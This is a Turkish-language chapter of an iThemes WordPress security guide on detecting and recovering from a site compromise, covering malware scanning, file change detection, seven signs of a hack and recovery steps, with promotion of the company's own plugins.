Bölüm 10: WordPress Güvenlik Felaketi Başına Geldiğinde

WordPress güvenlikle ilgili en iyi uygulamaları izleseniz bile sitenizin güvenliğinin ihlal edilmesi ihtimali vardır. Uzlaşma, bir bilgisayar korsanının web sitenizi ihlal ettiği ve kötü amaçlı yazılım bulaştırdığı anlamına gelir.

Güvenlik İhlali nedir?

Güvenlik ihlali, bir siber suçlunun web sitenize veya sunucunuza yetkisiz erişim elde edebildiği zamandır. Bilgisayar korsanları en yaygın WordPress güvenlik sorunlarından bazılarını kullandığından, güvenlik ihlalleri birçok farklı şekilde gerçekleşebilir. Eklentilerin ve temaların güncel olmayan sürümlerini çalıştırmaktan daha karmaşık SQL enjeksiyonlarına kadar, en uyanık site sahiplerinin bile bir güvenlik ihlali olabilir.

Güvenlik İhlalini Tespit Etme Zamanı: Etkilenen Bir Web Sitesini Temizlemede Önemli Bir Faktör

Bir web sitesi ihlalini keşfetmek için geçen ortalama sürenin 200 gün olduğunu biliyor muydunuz? Ne yazık ki, bir ihlali fark etmeniz ne kadar uzun sürerse, bir bilgisayar korsanı web sitenize, müşterilerinize ve size o kadar fazla zarar verebilir. Bir parça kötü amaçlı yazılım, 200 gün içinde şaşırtıcı miktarda hasara neden olabilir. Bu nedenle, bir güvenlik ihlalini tespit etmek için gereken süreyi azaltmak çok önemlidir.

Niye ya? 200 günlük hasardan sonra web sitenizi temizlemeniz gereken temizleme ve kesinti süresi de şaşırtıcı. Kötü amaçlı yazılımın dokunduğu her şeyi ve hangi müşterinin verilerinin çalındığını araştırma süresi, yalnızca ihlal tespit edilmediği sürece artar. Bir bilgisayar korsanı web sitenizi ziyaret ederken tüm tuş vuruşlarını kaydettiği için kredi kartlarını iptal etmeleri gerektiğini müşterilere bildirmek için harcayacağınız zamandan bahsetmiyorum bile.

Hacklenmenin maliyeti harika. İhlali araştırmak ve web sitenizi temizlemek için birine ödeme yapmanız gerekir. Bilgisayar korsanlığı onarım uzmanı, çalışırken web sitenizi kapatmak zorunda kalacak ve web siteniz kapalıyken insanlar yeni satın alma işlemleri yapamayacak. Müşterinizin güvenini kaybettikten sonra, size verecekleri gelecekteki satın alma işlemlerini büyük olasılıkla kaybedersiniz.

Bir saldırının maliyeti, bir ihlali mümkün olan en kısa sürede fark etmenin çok önemli olmasının nedenidir. İhlali ne kadar hızlı keşfederseniz, daha fazla zarar verilmesini o kadar hızlı durdurabilir ve web sitenizi ve işletmenizi o kadar hızlı tekrar çevrimiçi hale getirebilirsiniz.

Kötü Amaçlı Yazılım Tarayıcıları Yeterli mi?

Kötü amaçlı yazılım tarayıcıları, bilinen kötü amaçlı dosyalar ve komut dosyaları için WordPress web sitenizi taramanın bir yolunu sağlar. Ancak kötü amaçlı yazılım tarayıcıları bir güvenlik ihlalini tespit etmek için yeterli mi?

Tek kelimeyle, hayır. Web sitenize virüs bulaşıp bulaşmadığını kontrol etmek için yalnızca bir kötü amaçlı yazılım tarayıcısına güvenebileceğinizi düşünmeyin. Hiçbir kötü amaçlı yazılım tarayıcısı, var olan her kötü amaçlı yazılım parçasını tanımlayamaz. %100 doğru olduğunu iddia eden bir kötü amaçlı yazılım tarayıcısıyla karşılaşırsanız, çalıştırmalısınız çünkü bunun gibi iddialarda bulunan taramalar genellikle en az doğru olanlardır.

İmza ve Davranışsal Kötü Amaçlı Yazılım Algılama

Kötü amaçlı yazılım taramalarının ve virüsten koruma yazılımlarının çoğu, kötü amaçlı yazılımları tespit etmek için kötü amaçlı yazılım imzalarını kullanır. Daha gelişmiş kötü amaçlı yazılım taramaları, imza algılama ve davranış analizinin bir kombinasyonunu kullanır.

Kötü Amaçlı Yazılım İmzaları

Kötü amaçlı yazılım imzası, bilinen kötü amaçlı yazılım parçalarını tanımlamak için kullanılan bir dizi bayttır. Bazı kötü amaçlı yazılım tarayıcıları, milyonlarca bilinen virüsün kötü amaçlı yazılım imzalarıyla dolu bir veritabanı tarafından desteklenmektedir.

İmza tabanlı kötü amaçlı yazılım taraması hızlı, basittir ve bilinen ve iyi anlaşılan kötü amaçlı yazılım parçalarının %100'ünü tespit eder. Bunların hepsi harika ve düşük seviyeli bilgisayar korsanları tarafından eklenen kötü amaçlı yazılımları yakalayacak.

Ancak yetenekli bilgisayar korsanları, kötü amaçlı yazılım tarayıcılarının bilinen kötü amaçlı yazılımların imzalarını kontrol ettiğini bilir. Bu bilgisayar korsanları, ortalama tarayıcınız tarafından algılanmadan kalmak için kötü amaçlı yazılım imzalarını gizleme yeteneğine sahiptir.

Yeni kötü amaçlı yazılımlar, kötü amaçlı yazılım tarayıcılarının veritabanlarını en son imzaların tümü ile güncel tutamayacağı bir oranda yayınlanır. Dolayısıyla imza tabanlı bir tarayıcı, yeni bir kötü amaçlı yazılım parçası ile bir eklentinin benioku.txt dosyası arasındaki farkı anlayamaz.

Davranış Analizi

Davranış analizi, kötü amaçlı olup olmadığını belirlemek için bir yazılımın eylemlerini kontrol eder. Şüpheli veya kötü niyetli olarak kabul edilebilecek tonlarca farklı davranış türü vardır. Örneğin, iThemes Security Pro Site Scan, web sitelerini güvende tutmaya yardımcı olmak için Google Güvenli Tarama API'sinden yararlanır. Google Güvenli Tarama, bir yazılım parçasının trafiği bilinen bir kötü amaçlı siteye yönlendirip yönlendirmediğini kontrol eder.

Yine, kötü amaçlı yazılım algılamanın kusursuz bir yöntemi yoktur. Ancak davranışsal ve imza kontrollerinin bir kombinasyonu, bir güvenlik ihlali kanıtı konusunda uyarılma şansınızı önemli ölçüde artıracaktır.

Tüm Kötü Amaçlı Yazılımlar Hangi Davranışları Paylaşır?

Bir güvenlik ihlalini mümkün olan en kısa sürede tespit etmenin ne kadar önemli olduğunu ve yalnızca kötü amaçlı yazılım tespitine güvenmenin yeterli olmadığını biliyoruz. Bu nedenle, iThemes Security Pro'nun insanların web sitelerinde güvenlik ihlallerini algılaması için gereken süreyi nasıl azaltabileceğini merak ettik.

Kötü amaçlı yazılımın web sitenizde neden olduğu hasarın türü büyük ölçüde değişiklik gösterse de, yaptığı şey aşağıdaki üç şeyden birine veya bunların bir kombinasyonuna indirgenebilir.

1. Dosya Ekle – Casus yazılım biçimindeki kötü amaçlı yazılım, müşterinizin kredi kartı bilgilerini girerken tuş vuruşlarını kaydedecek kötü amaçlı bir dosya ekleyebilir.
2. Dosyaları Kaldır - Bazı kötü amaçlı yazılımlar meşru bir dosyayı kaldırır ve aynı ada sahip kötü amaçlı bir dosyayla değiştirir.
3. Dosyaları Değiştir – Kötü amaçlı yazılım, kötü amaçlı kodunu, değiştirdiği mevcut bir dosyada saklayarak gizlemeye çalışır.

Bir güvenlik ihlali belirtilerine karşı onları inceleyebilmeniz için web sitenizdeki beklenmedik değişiklikler konusunda uyarılmak güzel olmaz mıydı?

Bir Güvenlik İhlalini Tespit Etmek İçin Geçen Süreyi Nasıl Azaltabilirsiniz?

Bir güvenlik ihlalini hızlı bir şekilde tespit etmenin anahtarı, web sitenizdeki dosya değişikliklerini izlemektir.

iThemes Security Pro'daki Dosya Değişikliği Algılama özelliği, web sitenizin dosyalarını tarar ve web sitenizde değişiklikler meydana geldiğinde sizi uyarır.

Günlüklerinizde yeni dosya değişikliği etkinliğini görmenizin birkaç meşru nedeni vardır, ancak yapılan değişiklikler beklenmedikse, değişikliklerin kötü amaçlı olmadığından emin olmak için zaman ayırmalısınız. Örneğin, eklentiyi güncellediğiniz tarih ve saatte bir eklentide değişiklik yapıldığını görürseniz, araştırma yapmanıza gerek kalmaz.

iThemes Security Pro'da Dosya Değişikliği Algılamayı Etkinleştirme

Dosya değişikliklerini izlemeye başlamak için, güvenlik ayarlarının ana sayfasında Dosya Değişikliği Algılama'yı etkinleştirin.

Dosya Değişikliği Algılama etkinleştirildiğinde, iThemes Security Pro, web sitenizin tüm dosyalarını parçalar halinde taramaya başlayacaktır. Dosyalarınızı parçalar halinde taramak, dosya değişikliklerini izlemek için gereken kaynakları azaltmaya yardımcı olacaktır.

İlk dosya değişikliği taraması, web sitenizin dosyalarının ve dosya karmalarının bir dizinini oluşturacaktır. Dosya karması, dosya içeriğinin kısaltılmış, insan tarafından okunamayan bir sürümüdür.

İlk tarama tamamlandıktan sonra iThemes Security Pro, dosyanızı parçalar halinde taramaya devam edecektir. Sonraki taramalardan birinde bir dosya karması değişirse, bu, dosyanın içeriğinin değiştiği anlamına gelir.

Dosya Değişikliği Algılama ayarlarında Dosyaları Şimdi Tara düğmesini tıklatarak da manuel dosya değişikliği çalıştırabilirsiniz.

Dosya Değişiklik Bildirimi E-postalarını Etkinleştirme

Dosya değişiklikleri her zaman olur ve her değişiklik için bir e-posta uyarısı almak hızla bunaltıcı hale gelir. Ve siz farkına bile varmadan, kurt durumuna ağlayan bir çocuk olur ve dosya değişikliği uyarılarını tamamen görmezden gelmeye başlarsınız.

iThemes Security Pro'nun bildirimleri azaltmak için yasal değişiklikleri nasıl akıllıca tanımladığına ve sık güncellenmesi beklenen dosyalar için bildirimleri nasıl sessize alabileceğinize bir göz atalım.

Tüm iThemes Güvenlik bildirimlerinizi, iThemes Güvenlik eklentisi içindeki Bildirim Merkezi'nden yönetebilirsiniz. WordPress yönetici kontrol panelinizden Güvenlik > Ayarlar'ı ziyaret edin ve Bildirim Merkezi modülünü bulun.

iThemes Security Pro, Yasal Dosya Değişikliklerini Nasıl Tanımlar?

iThemes Security Pro'nun bir dosyada yapılan bir değişikliğin yasal olup olmadığını ve endişe kaynağı olup olmadığını algılamasının birkaç yolu vardır. iThemes Security Pro, doğrulayabileceği değişiklikler için bir Dosya Değişikliği bildirimi oluşturmaz.

1. Sürüm Yönetimi Tarafından Tamamlanan Eklenti/Tema Güncellemeleri

iThemes Security Pro'daki Sürüm Yönetimi özelliği, WordPress'i, eklentileri ve temaları otomatik olarak güncellemenize olanak tanır.

Sürüm Yönetimi tarafından bir güncelleme tamamlanırsa, iThemes Security Pro güncellemenin kaynağını bilir ve bir uyarı tetiklemez.

2. iThemes Eklentileri ve Temaları için Dosya Karşılaştırması

Çevrimiçi dosya karşılaştırmasını etkinleştirmek için Dosya Değişikliği Algılama ayarlarındaki Dosyaları Çevrimiçi Karşılaştır kutusunu işaretleyin.

Web sitenizdeki bir iThemes eklentisine veya temasına ait bir dosya değiştirildiğinde, iThemes sunucusundaki bir dosyayla karşılaştırılır. Web sitenizdeki dosya sürümünün karma değeri, iThemes sunucusundaki karma sürümle eşleşirse, bu yasal bir değişiklik olur ve bir uyarı almazsınız.

3. WordPress.org Çevrimiçi Dosya Karşılaştırması

WordPress.org deposundan yüklenen bir WordPress çekirdek dosyası veya eklenti değiştirilirse, dosya WordPress.org'daki sürümle karşılaştırılır. Karma değerler eşleşirse, değişiklikler kötü amaçlı değildir ve bir uyarı almazsınız.

4. Manuel Hariç Tutma

Dosyaları, dizinleri ve dosya türlerini Dosya Değişikliği Algılama ayarlarında Dosya Değişikliği Algılamadan hariç tutabilirsiniz.

Genel kural, düzenli olarak güncelleneceğini bildiğiniz dosyaları hariç tutmanızda bir sorun yoktur. Yedekleme ve önbellek dosyaları buna mükemmel bir örnektir. Bu tür dosyaları hariç tutmak, fazladan gürültünün çoğunu yatıştırır.

WordPress Web Sitenizin Saldırıya Uğradığının 7 İşareti

Kendinizi “ WordPress sitem saldırıya uğradı mı? ”, bazı hızlı yanıtlar isteyeceğiniz anlamına gelir.

Bir web sitesi ihlali belirtilerini ne kadar hızlı fark ederseniz, sitenizi o kadar hızlı temizleyebilirsiniz. Web sitenizi ne kadar hızlı temizlerseniz, saldırının web sitenize verebileceği zarar o kadar az olur.

1. Ana Sayfanız Farklıdır

Ana sayfanızdaki değişiklikler bariz bir işaret gibi görünüyor. Ancak, gerçekten kaç kez kapsamlı bir kontrol veya ana sayfanız var? Genellikle ana sayfa URL'me değil, doğrudan giriş URL'me gittiğimi biliyorum. Oradan giriş yapıyorum, sitemi güncelliyorum veya bir gönderiyi düzenliyorum. Geldiğim işi bitirdikten sonra genellikle web sitemin ana sayfasına bakmadan çıkıyorum.

Bazı bilgisayar korsanlarının birincil amacı, bir web sitesini trollemek veya ün kazanmaktır. Bu nedenle, ana sayfanızı yalnızca komik buldukları bir şeyle değiştirirler veya arama kartıyla saldırıya uğramış bir şekilde bırakırlar.

Ana sayfanızda bir değişiklik fark ederseniz, BackupBuddy gibi güvenilir bir WordPress yedekleme eklentisi ile yapılmış bir yedekleme dosyasını kullanarak web sitenizi hızlı ve kolay bir şekilde geri yükleyebilirsiniz.

2. Web Sitenizin Performansı Düştü

Bir enfeksiyon olduğunda siteniz halsiz hissedebilir. Brute force saldırıları yaşıyorsanız veya kripto para madenciliği için sunucu kaynaklarınızı kullanan kötü niyetli bir script varsa web sitenizde yavaşlamalar yaşayabilirsiniz. Benzer şekilde, bir DDoS (veya hizmet reddi saldırısı ), bir IP ağı aynı anda web sitenize çökmesine neden olmak için istekler gönderdiğinde gerçekleşir.

3. Web Siteniz Kötü Amaçlı veya Spam Popup Reklamları İçeriyor

Ziyaretçileriniz onları kötü amaçlı bir web sitesine yönlendiren açılır pencereler görürse, bir bilgisayar korsanının web sitenizi tehlikeye atmış olma olasılığı yüksektir. Bu tür bir saldırının amacı, trafiği sitenizden saldırganın sitesine yönlendirerek, kullanıcıları Tıklama Başına Ödeme reklamcılığı için tıklama sahtekarlığıyla hedefleyebilmelerini sağlamaktır.

Bu tür bir hacklemeyle ilgili en sinir bozucu şey, açılır pencereleri göremeyebilmenizdir. Bir açılır pencere hack'i, giriş yapmış kullanıcılara gösterilmeyecek şekilde tasarlanabilir ve bu da web sitesi sahiplerinin onları görme ihtimalini azaltır. Böylece site sahibi çıkış yapsa bile pop-up'lar asla görüntülenmez.

Tarayıcınızda bir reklam engelleyici uzantısı kullanıyorsanız, açılır pencerelerin görünümü de sınırlanabilir. Örneğin, bir müşteri bir açılır pencere hack'i bildirdi ve ekran görüntülerini ve açılır pencerelerin bir videosunu paylaştı. Web sitelerinde saatlerce dolaştıktan sonra, rapor ettikleri hiçbir şeyi yeniden oluşturamadım. Web sitesinin değil, kişisel bilgisayarlarının saldırıya uğradığına ikna oldum.

Sonunda, açılır pencereleri neden göremediğim aklıma geldi. Tarayıcıma bir reklam engelleyici uzantısı yüklemiştim. Reklam engelleyici uzantısını devre dışı bırakır bırakmaz her yerde açılır pencereler görebildim. Umarım aynı hataya düşmekten sizi kurtarmak için bu utanç verici hikayeyi paylaşıyorum.

4. Web Sitesi Trafiğinde Bir Düşüş Fark Ettiniz

Google Analytics hesabınıza giriş yaparsanız ve web sitesi trafiğinde keskin bir düşüş fark ederseniz, WordPress siteniz saldırıya uğramış olabilir. Site trafiğindeki bir düşüş bir araştırmayı hak ediyor. Sitenizde, ziyaretçileri sitenizden uzaklaştıran kötü amaçlı bir komut dosyası olabilir veya Google, web sitenizi kötü amaçlı bir site olarak kara listeye alarak zaten yapmış olabilir.

Aramak istediğiniz ilk şey, web sitenizin giden trafiğidir. Web sitenizi Google Analytics ile izleyerek, sitenizi sitenizden çıkan trafiği takip edecek şekilde yapılandırmanız gerekir. WordPress sitenizdeki giden trafiği izlemenin en kolay yolu, bir WordPress Google Analytics eklentisi kullanmaktır.

6. Beklenmeyen Yeni Kullanıcılar

Web sitenizde beklenmedik yeni yönetici kullanıcı kayıtları varsa, bu, WordPress sitenizin saldırıya uğradığının bir başka işaretidir. Saldırgan, güvenliği ihlal edilmiş bir kullanıcının istismarı yoluyla yeni bir yönetici kullanıcı oluşturabilir. Yeni yönetici ayrıcalıklarıyla, bilgisayar korsanı sitenize büyük zararlar vermeye hazır.

Daha önceki WP GDPR Uyumluluk eklentisini hatırlıyor musunuz? Kasım 2018'de, müşteri web sitelerinde yeni yönetici kullanıcıların oluşturulduğuna dair birkaç rapor aldık. Bilgisayar korsanları, eklentiyi çalıştıran WordPress sitelerinde yeni yönetici kullanıcılar oluşturmak için WP GDPR Uyumluluk eklentisinde (güvenlik açığı 1.4.3 sürümünde düzeltildi) bir güvenlik açığı kullandı. Eklenti istismarı, yetkisiz kullanıcıların, bir aboneden bir yöneticiye varsayılan yeni kullanıcı rolünü değiştirmek için kullanıcı kaydını değiştirmesine izin verdi. Ne yazık ki, bu tek güvenlik açığı değildi ve saldırganın oluşturduğu yeni kullanıcıları kaldıramaz ve eklentiye yama yapamazsınız.

WP GDPR Uyumluluğu ve WooCommerce yüklediyseniz, sitenize kötü amaçlı kod enjekte edilmiş olabilir. Saldırganlar, veritabanına bir arka kapı yükleyicisi eklemek için WooCommerce eklentisi arka plan yükleyicisini kullanabilir. Sitenizde yüklü bir arka kapı varsa, bir bilgisayar korsanlığı onarım uzmanıyla iletişime geçmelisiniz. Başka bir seçenek de, önceki bir yedeklemeyi kullanarak ihlalden önce web sitenizin bir kopyasına geri dönmek için bir yedekleme dosyası kullanmaktır.

7. Yönetici Kullanıcılar Kaldırıldı

Parolanızı sıfırladıktan sonra bile WordPress sitenize giriş yapamıyorsanız, bu ciddi bir enfeksiyon belirtisi olabilir.

Gentoo Github deposu saldırıya uğradığında, saldırganın yaptığı ilk şey tüm yönetici kullanıcıları silmek oldu. Peki bu bilgisayar korsanı Github hesaplarına nasıl girdi? Farklı bir sitede bir Gentoo yönetici kullanıcısının parolası keşfedildi. Kullanıcı adı ve şifrenin kazıma veya bir veritabanı dökümü yoluyla keşfedildiğini tahmin ediyorum.

Yöneticinin Gentoo Github hesabının şifresi, ele geçirilen hesapta kullanılandan farklı olsa da, çok benzerdi. Yani bu benim bir hesapta iAmAwesome2020'yi ve başka bir sitede iAmAwesome2021'i şifre olarak kullanmam gibi olurdu. Böylece bilgisayar korsanları şifreyi biraz çaba sarf ederek bulabildiler. Gördüğümüz gibi, her hesap için benzersiz bir şifre kullanmalısınız. Parolalarınızda basit bir değişiklik yeterli değildir. LastPass'i kullanarak her site için güçlü, benzersiz parolalar oluşturabilir ve güvenli bir şekilde saklayabilirsiniz.

Afetten Nasıl Geri Dönülür

Bir ihlal olduğundan şüpheleniyorsanız, hasarı azaltmak için atabileceğiniz birkaç hızlı adım vardır.

Sitenizin Önceki/Temiz Yedeğine Geri Yükleyin

Bir güvenlik ihlalini geri almanın en kesin yolu, sitenizi saldırıdan önceki bir önceki sürüme geri yüklemektir. Bu nedenle kapsamlı bir WordPress yedekleme çözümüne sahip olmak çok önemlidir. Yedeklemeleri otomatik olarak çalışacak şekilde planlamak için BackupBuddy'yi kullanmanızı öneririz, böylece her zaman bir yedeğiniz olur.

Yalnızca önceki bir yedeği geri yüklemenin sitenizi aynı ihlale karşı savunmasız bırakabileceğini unutmayın, bu nedenle bu adımları da izlemeniz önemlidir.

Tüm Eski Eklentileri ve Temaları Hemen Güncelleyin

Güvenlik açığı bulunan bir eklenti veya tema hala suçlu olabilir, bu nedenle güncel olmayan tüm eklentileri veya temaları DERHAL güncellemek önemlidir. Web sitenizi daha önceki temiz bir sürüme geri yükleseniz bile, aynı güvenlik açıkları var olmaya devam eder ve yeniden saldırıya uğrayabilir.

Ayrıca, geliştiriciden bir düzeltme eki olmayan güvenlik açığı bulunan bir eklenti veya tema çalıştırmadığınızı da kontrol etmek isteyebilirsiniz. Bu eklentiyi hemen kaldırmanız gerekecek.

İki Faktörlü Kimlik Doğrulamayı Etkinleştir

Yönetici girişlerini güvenli hale getirmek için iki faktörlü kimlik doğrulama kullanmıyorsanız, hemen etkinleştirin. Bu ek güvenlik katmanı, yetkisiz kullanıcıların herhangi bir yönetici hesabını hacklememesini sağlamaya yardımcı olacaktır.

Profesyonel Kötü Amaçlı Yazılımların Kaldırılması İçin Yardım İsteyin

WordPress güvenlik ihlalleri sunucu düzeyinde (WordPress kurulumunuzdan daha derin) meydana gelir, bu nedenle profesyonel bir kötü amaçlı yazılım temizleme servisine başvurmanız gerekebilir. Profesyonel kötü amaçlı yazılımların kaldırılması için WeWatchYourWebsite'yi öneriyoruz.

Özet: WordPress Security Ultimate Guide

Bu WordPress güvenlik kılavuzunda ÇOK SAYIDA ele aldık! Ancak bu kılavuzdaki ipuçlarını izleyerek web sitenize yapılan saldırıların neredeyse %100'ünü engelleyeceksiniz.

Bir WordPress Güvenlik Eklentisi, WordPress Web Sitenizin Güvenliğini Sağlayabilir

Bu kılavuzdaki WordPress güvenlik konuları bilgisi ile birlikte bir WordPress güvenlik eklentisi, WordPress web sitenizin güvenliğini sağlamaya yardımcı olabilir. WordPress güvenlik eklentimiz iThemes Security Pro, web sitenizi yaygın WordPress güvenlik açıklarından korumak ve korumak için 50'den fazla yol sunar. WordPress, iki faktörlü kimlik doğrulama, kaba kuvvet koruması, güçlü parola uygulaması ve daha fazlasıyla web sitenize ekstra bir güvenlik katmanı ekleyebilirsiniz.

Michael Moore

Michael, sitelerinizi güvende tutmanıza yardımcı olmak için her hafta WordPress Güvenlik Açığı Raporunu bir araya getiriyor. iThemes'te Ürün Müdürü olarak, iThemes ürün serisini geliştirmeye devam etmemize yardımcı oluyor. Dev bir inek ve teknik, eski ve yeni her şeyi öğrenmeyi seviyor. Michael'ı karısı ve kızıyla takılırken, çalışmadığı zamanlarda kitap okurken veya müzik dinlerken bulabilirsiniz.